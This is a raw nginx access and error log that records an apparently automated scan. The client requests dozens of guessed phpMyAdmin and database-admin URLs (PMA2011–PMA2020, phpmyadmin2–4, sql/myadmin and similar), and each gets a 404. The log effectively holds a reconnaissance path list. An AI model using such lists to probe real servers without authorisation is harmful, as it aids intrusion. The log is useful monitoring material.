frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:40 +0000] "GET /PMA2017/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:40 [error] 20#20: *220 open() "/frontend/app/admin/db/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /admin/db/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:40 +0000] "GET /admin/db/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:40 [error] 20#20: *221 open() "/frontend/app/db/dbweb/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /db/dbweb/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:40 +0000] "GET /db/dbweb/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:41 [error] 20#20: *222 open() "/frontend/app/PMA2011/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /PMA2011/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:41 +0000] "GET /PMA2011/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:41 +0000] "GET /db/websql/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:41 [error] 20#20: *223 open() "/frontend/app/db/websql/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /db/websql/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/06 08:06:41 [error] 20#20: *224 open() "/frontend/app/sql/phpmy-admin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /sql/phpmy-admin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:41 +0000] "GET /sql/phpmy-admin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:41 [error] 20#20: *225 open() "/frontend/app/phpmyadmin2012/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin2012/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:41 +0000] "GET /phpmyadmin2012/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:41 +0000] "GET /phpmyadmin3/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:41 [error] 20#20: *226 open() "/frontend/app/phpmyadmin3/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin3/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/06 08:06:41 [error] 20#20: *227 open() "/frontend/app/PMA2016/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /PMA2016/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:41 +0000] "GET /PMA2016/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:41 +0000] "GET /shopdb/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:41 [error] 20#20: *228 open() "/frontend/app/shopdb/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /shopdb/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/06 08:06:41 [error] 20#20: *229 open() "/frontend/app/administrator/pma/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /administrator/pma/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:41 +0000] "GET /administrator/pma/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:41 [error] 20#20: *230 open() "/frontend/app/administrator/web/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /administrator/web/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:41 +0000] "GET /administrator/web/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:41 [error] 20#20: *231 open() "/frontend/app/phpmyadmin4/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin4/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:41 +0000] "GET /phpmyadmin4/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:42 [error] 20#20: *232 open() "/frontend/app/phpmyadmin2014/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin2014/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:42 +0000] "GET /phpmyadmin2014/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:42 [error] 20#20: *233 open() "/frontend/app/sql/sqladmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /sql/sqladmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:42 +0000] "GET /sql/sqladmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:42 +0000] "GET /phpmyadmin2012/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:42 [error] 20#20: *234 open() "/frontend/app/phpmyadmin2012/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin2012/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:42 +0000] "GET /PMA2012/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:42 [error] 20#20: *235 open() "/frontend/app/PMA2012/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /PMA2012/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/06 08:06:42 [error] 20#20: *236 open() "/frontend/app/phpmyadmin2/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin2/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:42 +0000] "GET /phpmyadmin2/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:42 [error] 20#20: *237 open() "/frontend/app/administrator/web/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /administrator/web/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:42 +0000] "GET /administrator/web/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:42 +0000] "GET /program/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:42 [error] 20#20: *238 open() "/frontend/app/program/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /program/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/06 08:06:42 [error] 20#20: *239 open() "/frontend/app/MyAdmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /MyAdmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:42 +0000] "GET /MyAdmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:42 [error] 20#20: *240 open() "/frontend/app/PMA2018/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /PMA2018/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:42 +0000] "GET /PMA2018/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:42 +0000] "GET /sql/phpmyadmin2/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:42 [error] 20#20: *241 open() "/frontend/app/sql/phpmyadmin2/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /sql/phpmyadmin2/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/06 08:06:43 [error] 20#20: *242 open() "/frontend/app/administrator/web/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /administrator/web/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:43 +0000] "GET /administrator/web/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:43 +0000] "GET /_phpMyAdmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:43 [error] 20#20: *243 open() "/frontend/app/_phpMyAdmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /_phpMyAdmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/06 08:06:43 [error] 20#20: *244 open() "/frontend/app/PMA2020/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /PMA2020/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:43 +0000] "GET /PMA2020/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:43 [error] 20#20: *245 open() "/frontend/app/PMA2012/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /PMA2012/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:43 +0000] "GET /PMA2012/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:43 [error] 20#20: *246 open() "/frontend/app/phpmyadmin2014/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin2014/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:43 +0000] "GET /phpmyadmin2014/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:43 [error] 20#20: *247 open() "/frontend/app/phpmyAdmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyAdmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:43 +0000] "GET /phpmyAdmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:43 [error] 20#20: *248 open() "/frontend/app/sql/myadmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /sql/myadmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:43 +0000] "GET /sql/myadmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:43 [error] 20#20: *249 open() "/frontend/app/admin/sqladmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /admin/sqladmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:43 +0000] "GET /admin/sqladmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:43 [error] 20#20: *250 open() "/frontend/app/admin/pMA/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /admin/pMA/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:43 +0000] "GET /admin/pMA/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:43 [error] 20#20: *251 open() "/frontend/app/administrator/web/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /administrator/web/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:43 +0000] "GET /administrator/web/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:44 [error] 20#20: *252 open() "/frontend/app/sql/websql/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /sql/websql/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:44 +0000] "GET /sql/websql/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:44 [error] 20#20: *253 open() "/frontend/app/shopdb/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /shopdb/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:44 +0000] "GET /shopdb/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:44 +0000] "GET /phpMyAdmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:44 [error] 20#20: *254 open() "/frontend/app/phpMyAdmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpMyAdmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/06 08:06:44 [error] 20#20: *255 open() "/frontend/app/mysql/sqlmanager/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:44 +0000] "GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:44 +0000] "GET /phpMyAdmin4/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:44 [error] 20#20: *256 open() "/frontend/app/phpMyAdmin4/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpMyAdmin4/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/06 08:06:44 [error] 20#20: *257 open() "/frontend/app/administrator/PMA/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /administrator/PMA/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:44 +0000] "GET /administrator/PMA/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:44 [error] 20#20: *258 open() "/frontend/app/db/myadmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /db/myadmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:44 +0000] "GET /db/myadmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:44 [error] 20#20: *259 open() "/frontend/app/mysqlmanager/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /mysqlmanager/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:44 +0000] "GET /mysqlmanager/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:44 [error] 20#20: *260 open() "/frontend/app/shopdb/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /shopdb/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:44 +0000] "GET /shopdb/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:45 +0000] "GET /sql/webdb/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:45 [error] 20#20: *261 open() "/frontend/app/sql/webdb/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /sql/webdb/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/06 08:06:45 [error] 20#20: *262 open() "/frontend/app/db/phpmyadmin3/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /db/phpmyadmin3/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:45 +0000] "GET /db/phpmyadmin3/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:45 [error] 20#20: *263 open() "/frontend/app/pma2015/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /pma2015/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:45 +0000] "GET /pma2015/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:45 [error] 20#20: *264 open() "/frontend/app/sql/phpMyAdmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /sql/phpMyAdmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:45 +0000] "GET /sql/phpMyAdmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:45 +0000] "GET /db/db-admin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:45 [error] 20#20: *265 open() "/frontend/app/db/db-admin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /db/db-admin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/06 08:06:45 [error] 20#20: *266 open() "/frontend/app/PMA2016/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /PMA2016/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:45 +0000] "GET /PMA2016/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:46 +0000] "GET /sql/webdb/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:46 [error] 20#20: *267 open() "/frontend/app/sql/webdb/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /sql/webdb/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/06 08:06:46 [error] 20#20: *268 open() "/frontend/app/sql/phpmyadmin2/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /sql/phpmyadmin2/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:46 +0000] "GET /sql/phpmyadmin2/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:46 [error] 20#20: *269 open() "/frontend/app/pma2013/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /pma2013/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:46 +0000] "GET /pma2013/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:46 [error] 20#20: *270 open() "/frontend/app/pma/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /pma/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:46 +0000] "GET /pma/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:46 +0000] "GET /dbadmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:46 [error] 20#20: *271 open() "/frontend/app/dbadmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /dbadmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/06 08:06:46 [error] 20#20: *272 open() "/frontend/app/db/phpMyAdmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /db/phpMyAdmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:46 +0000] "GET /db/phpMyAdmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:46 [error] 20#20: *273 open() "/frontend/app/phpmy-admin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmy-admin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
